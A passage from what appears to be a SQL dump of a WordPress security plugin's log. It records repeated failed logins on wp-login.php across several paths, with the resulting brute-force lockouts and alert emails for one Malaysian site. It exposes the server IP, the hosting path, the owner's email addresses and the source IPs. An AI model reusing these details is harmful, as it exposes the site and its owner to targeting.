attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:54:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:54:18\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:54:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:54:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:54:20','2019-09-21 14:54:18',19219568,20625016,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.40.233'),(26429,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:54:20','2019-09-21 14:54:18',19426280,20625016,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.40.233'),(26430,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6BFiJ7D9Gn7wDPh8oXAAAANM\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.234.94\";s:11:\"REMOTE_PORT\";s:5:\"34213\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6BFiJ7D9Gn7wDPh8oXAAAANM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569077764.37\";s:12:\"REQUEST_TIME\";s:10:\"1569077764\";}}','notice','2019-09-21 14:56:05','2019-09-21 14:56:04',19136064,20627416,'https://bintara.com.my/test/wp-login.php',1,0,'97.74.234.94'),(26431,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:56:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:56:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:56:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:56:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:56:05','2019-09-21 14:56:04',19220760,20627416,'https://bintara.com.my/test/wp-login.php',1,0,'97.74.234.94'),(26432,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:56:05','2019-09-21 14:56:04',19428176,20627416,'https://bintara.com.my/test/wp-login.php',1,0,'97.74.234.94'),(26433,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6F3kXpgmG5P@iB8lDywAAAIQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.169\";s:11:\"REMOTE_PORT\";s:5:\"51686\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6F3kXpgmG5P@iB8lDywAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077783.9897\";s:12:\"REQUEST_TIME\";s:10:\"1569077783\";}}','notice','2019-09-21 14:56:25','2019-09-21 14:56:24',19134160,20622160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'163.172.105.169'),(26434,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:56:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:56:24\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:56:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:56:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:56:25','2019-09-21 14:56:24',19218952,20622160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'163.172.105.169'),(26435,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:56:25','2019-09-21 14:56:24',19426704,20622160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'163.172.105.169'),(26436,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6IrfBTP0kPOVnb8jy4QAAAFg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"34960\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6IrfBTP0kPOVnb8jy4QAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077794.3737\";s:12:\"REQUEST_TIME\";s:10:\"1569077794\";}}','notice','2019-09-21 14:56:36','2019-09-21 14:56:34',19135728,20624808,'https://bintara.com.my/2019/wp-login.php',1,0,'52.64.168.0'),(26437,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:56:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:56:34\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:56:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:56:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:56:36','2019-09-21 14:56:34',19220584,20624808,'https://bintara.com.my/2019/wp-login.php',1,0,'52.64.168.0'),(26438,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:56:36','2019-09-21 14:56:34',19427416,20624808,'https://bintara.com.my/2019/wp-login.php',1,0,'52.64.168.0'),(26439,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6InkXpgmG5P@iB8lD1gAAAIQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"40274\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6InkXpgmG5P@iB8lD1gAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077794.7286\";s:12:\"REQUEST_TIME\";s:10:\"1569077794\";}}','notice','2019-09-21 14:56:36','2019-09-21 14:56:35',19138520,20626552,'https://bintara.com.my/wp/wp-login.php',1,0,'178.128.212.173'),(26440,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6O3kXpgmG5P@iB8lD6wAAAIo\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"66.70.160.187\";s:11:\"REMOTE_PORT\";s:5:\"53246\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6O3kXpgmG5P@iB8lD6wAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077819.6404\";s:12:\"REQUEST_TIME\";s:10:\"1569077819\";}}','notice','2019-09-21 14:57:01','2019-09-21 14:56:59',19132424,20622672,'https://bintara.com.my/wp/wp-login.php',1,0,'66.70.160.187'),(26441,0,'lockout','host-lockout::66.70.160.187','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"66.70.160.187\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:56:59\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:56:59\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:56:59\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:56:59\";s:12:\"lockout_host\";s:13:\"66.70.160.187\";}','action','2019-09-21 14:57:01','2019-09-21 14:56:59',19218264,20622672,'https://bintara.com.my/wp/wp-login.php',1,0,'66.70.160.187'),(26442,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"66.70.160.187\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:56:59\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:56:59\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:56:59\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:56:59\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:57:01','2019-09-21 14:56:59',19218232,20622672,'https://bintara.com.my/wp/wp-login.php',1,0,'66.70.160.187'),(26443,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:57:01','2019-09-21 14:56:59',19426296,20622672,'https://bintara.com.my/wp/wp-login.php',1,0,'66.70.160.187'),(26444,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6QFiJ7D9Gn7wDPh8oawAAAM4\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.174.10\";s:11:\"REMOTE_PORT\";s:5:\"49756\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\